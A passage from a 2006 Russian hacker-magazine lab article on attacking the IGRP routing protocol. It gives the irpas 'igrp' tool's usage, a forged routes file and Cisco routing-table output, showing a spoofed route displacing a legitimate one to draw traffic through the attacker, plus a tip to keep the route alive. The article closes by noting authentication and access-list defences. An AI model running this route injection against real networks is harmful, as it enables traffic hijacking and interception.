Издательский дом ООО "Гейм Лэнд"СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #66, МАЙ 2006 г.

лабораторная работа

КОНСТАНТИН ГАВРИЛЕНКО

Спецвыпуск: Хакер, номер #066, стр. 066-018-13


Metric = Metric * K5/ (reliability + K4)

Константы К1 — К5 используются для более детального контроля над получаемой метрикой и адаптации протокола для нужд конкретной сети. По умолчанию константы К1 и К3 равны 1, а константы К2, К4 и К5 — 0.

Листинг 36. Упрощенное уравнение

Metric = (bandwidth + delay)

Опыт показывает, что обычно системные администраторы не изменяют значения констант. Впрочем, делать это и не рекомендуется, кроме тех случаев, когда ты досконально знаешь особенности работы алгоритма протокола маршрутизации (каким образом такие изменения могут повлиять на работу маршрутизаторов). Как и в остальных протоколах маршрутизации по вектору расстояния, предпочтение отдается маршруту с меньшей метрикой.

[ЭКСПЕРИМЕНТ (продолжение)]

[ввод новых маршрутов в IGRP.] Для ввода новых маршрутов можно воспользоваться утилитой igrp из irpas suite — единственным на сегодня доступным средством ввода произвольных маршрутов в протокол IGRP.

Листинг 36. Ввод новых маршрутов

arhontus irpas # ./igrp --help

Usage:

./igrp [-v[v[v]]] -i <interface> -f <routes file>

-a <autonomous system> [-b brute force end]

[-S <spoofed source IP>] [-D <destination ip>]

Дополнительно создадим файл, где описаны маршруты, которые будем вводить в автономную систему.

Листинг 37. Формат файла, в котором описаны маршруты

route:delay:bandwidth:mtu:reliability:load:hopcount

Листинг 38. Таблица маршрутизации

sh ip route igrp

I 192.168.10.0/24 [100/8576] via 192.168.69.100, 00:00:16, Ethernet0

I 192.168.40.0/24 [100/8265] via 192.168.69.100, 00:00:16, Ethernet0

Листинг 39. Ввод произвольного маршрута и изменение таблицы маршрутизации

arhontus irpas # cat routes.kos

192.168.10.0:1000:476:1500:255:1:1

arhontus irpas # ./igrp -v -i eth0 -a 31337 -D 192.168.69.36 -f routes.kos

sh ip route igrp

I 192.168.10.0/24 [100/8576] via 192.168.69.100, 00:00:16, Ethernet0

I 192.168.40.0/24 [100/8265] via 192.168.69.100, 00:00:16, Ethernet0

I 192.168.55.0/24 [100/2100] via 192.168.69.102, 00:00:02, Ethernet0

Наш маршрут был принят без особых проблем. Теперь попытаемся изменить маршрутизацию существующих маршрутов и перенаправить весь трафик через себя. Зная, каким образом подсчитывается метрика, укажем самые выигрышные значения вводимого маршрута, отошлем его маршрутизатору и посмотрим, каким образом изменилась метрика.

Листинг 40. Посыл маршрутизатору и изменение метрики

arhontus irpas # cat routes.kos

192.168.10.0:1:1:1500:255:1:1

sh ip route igrp

I 192.168.10.0/24 [100/1101] via 192.168.69.102, 00:00:01, Ethernet0

Наш маршрут вытеснил предыдущий легитимный маршрут, чего мы и хотели. Не забудь посылать регулярные пакеты обновлений каждые 90 секунд, иначе твой маршрут объявят мертвым и быстро исключат из таблицы маршрутизации.

Листинг 41. Значения по умолчанию (команда sh ip protocols)

2503b#sh ip protocols

Routing Protocol is "igrp 31337"

Sending updates every 90 seconds, next due in 32 seconds

Invalid after 270 seconds, hold down 280, flushed after 630

[ВЫВОДЫ]

Мы рассмотрели принципы атак на протоколы маршрутизации, работающие по алгоритму маршрутизации по вектору расстояния. Большинство описанных атак могут быть предотвращены или вовремя замечены, если протоколы маршрутизации настроены правильно и используются аутентификация и листы контроля доступа, также при установке и мониторинге сервера журнала событий. Жаль, но мы живем в неидеальном мире, и большинство системных администраторов забывают или просто игнорируют важность обеспечения безопасности протоколов маршрутизации. В то же время помни: тот, кто контролирует маршруты, соединяющие сети, тот контролирует сеть в целом

Назад на стр. 066-018-12  Содержание